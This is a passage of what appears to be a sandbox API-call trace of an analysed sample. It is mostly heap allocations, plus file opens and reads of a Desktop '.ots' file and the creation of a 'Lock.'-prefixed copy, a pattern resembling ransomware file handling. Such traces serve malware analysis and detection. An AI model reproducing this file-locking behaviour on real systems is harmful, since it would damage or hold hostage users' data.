0x34a00f0 [0165.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0165.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0165.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0165.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.604] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.604] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.604] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.604] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/gJ2GDQDH7i.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gj2gdqdh7i.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0165.604] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.604] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0165.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0165.605] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.605] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.605] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0165.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.605] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.gJ2GDQDH7i.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.gj2gdqdh7i.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0165.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0165.606] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.606] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.606] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0165.606] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.606] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0165.606] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x802, lpOverlapped=0x0) returned 1 [0165.607] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0165.607] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x802) returned 0x2416270 [0165.608] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0165.608] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0165.608] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0165.608] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.609] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0165.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0165.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0165.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.610] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0165.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.611] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0165.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.612] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0165.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0165.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.613] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 